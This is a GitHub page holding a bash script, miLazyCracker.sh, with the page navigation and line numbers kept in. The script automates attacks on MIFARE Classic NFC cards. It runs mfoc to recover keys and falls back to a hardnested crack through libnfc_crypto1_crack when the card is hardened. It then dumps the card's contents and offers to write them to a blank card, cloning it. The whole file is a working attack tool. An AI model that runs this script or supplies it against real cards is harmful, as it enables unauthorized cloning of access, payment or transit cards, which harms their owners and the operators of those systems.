-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathmiLazyCracker.sh
130 lines (113 loc) · 3.73 KB
/
miLazyCracker.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/bin/bash
# This is a general-purpose function to ask Yes/No questions in Bash, either
# with or without a default answer. It keeps repeating the question until it
# gets a valid answer.
ask() {
# http://djm.me/ask
local prompt default REPLY
while true; do
if [ "${2:-}" = "Y" ]; then
prompt="Y/n"
default=Y
elif [ "${2:-}" = "N" ]; then
prompt="y/N"
default=N
else
prompt="y/n"
default=
fi
# Ask the question (not using "read -p" as it uses stderr not stdout)
echo -n "$1 [$prompt] "
# Read the answer (use /dev/tty in case stdin is redirected from somewhere else)
read REPLY </dev/tty
# Default?
if [ -z "$REPLY" ]; then
REPLY=$default
fi
# Check if the reply is valid
case "$REPLY" in
Y*|y*) return 0 ;;
N*|n*) return 1 ;;
esac
done
}
myUID=$(nfc-list -t 1|sed -n 's/ //g;/UID/s/.*://p')
TMPFILE_MFD="mfc_${myUID}_dump.mfd"
TMPFILE_UNK="mfc_${myUID}_unknownMfocSectorInfo.txt"
TMPFILE_FND="mfc_${myUID}_foundKeys.txt"
if [ -f "$TMPFILE_FND" ]; then
mfoc -f "$TMPFILE_FND" -O "$TMPFILE_MFD" -D "$TMPFILE_UNK"
else
mfoc -O "$TMPFILE_MFD" -D "$TMPFILE_UNK"
fi
mfocResult=$?
prngNotVulnerable=9
keepTrying=1
foundKeysForMFOC=" "
while [ $keepTrying -eq 1 ]; do
#echo "MFOC result: $mfocResult"
if [ "$mfocResult" == "$prngNotVulnerable" ]; then
echo "MFOC not possible, detected hardened Mifare Classic"
if [ "$mfocResult" -eq 9 ]; then
count=0
while read -r LINE; do
let count++
#echo "$count $LINE"
done < "$TMPFILE_UNK"
arr=($(echo "$LINE" | tr ';' ' '))
#echo ${arr[0]}
#echo ${arr[1]}
#echo ${arr[2]}
#echo ${arr[3]}
#echo ${arr[4]}
temp=($(echo ${arr[0]}|fold -w2))
knownKey=${temp[5]}${temp[4]}${temp[3]}${temp[2]}${temp[1]}${temp[0]}
knownSectorNum=${arr[1]}
knownKeyLetter=${arr[2]}
unknownSectorNum=${arr[3]}
unknownKeyLetter=${arr[4]}
knownBlockNum=$((knownSectorNum * 4))
unknownBlockNum=$((unknownSectorNum * 4))
if [ "$knownSectorNum" -gt 31 ]; then
knownBlockNum=$((128+((knownSectorNum-32)*16)))
fi
if [ "$unknownSectorNum" -gt 31 ]; then
unknownBlockNum=$((128+((unknownSectorNum-32)*16)))
fi
echo "Trying HardNested Attack..."
mycmd=(libnfc_crypto1_crack "$knownKey" "$knownBlockNum" "$knownKeyLetter" "$unknownBlockNum" "$unknownKeyLetter" "$TMPFILE_FND")
echo "${mycmd[@]}"
"${mycmd[@]}"
else
echo "mfoc returned: $mfocResult"
keepTrying=0
fi
cryptoCrackResult=$?
if [ "$cryptoCrackResult" -eq 0 ];then
while read -r LINE
do
echo "$LINE"
done < "$TMPFILE_FND"
#arr=(`echo $LINE | tr ';' ' '`)
#echo ${arr[0]}
#echo ${arr[1]}
#echo ${arr[2]}
#foundKeysForMFOC="$foundKeysForMFOC-k ${arr[0]} "
mycmd=(mfoc -f "$TMPFILE_FND" -O "$TMPFILE_MFD" -D "$TMPFILE_UNK")
echo "${mycmd[@]}"
"${mycmd[@]}"
mfocResult=$?
fi
else
keepTrying=0
fi
done
rm -f "$TMPFILE_UNK" "0x${myUID}_"*".txt"
if [ $mfocResult -eq 0 ]; then
echo -e "\n\nDump left in: $TMPFILE_MFD"
if ask "Do you want clone the card? Place card on reader now and press Y"; then
nfc-mfclassic W a $TMPFILE_MFD
fi
else
rm -f "$TMPFILE_MFD"
fi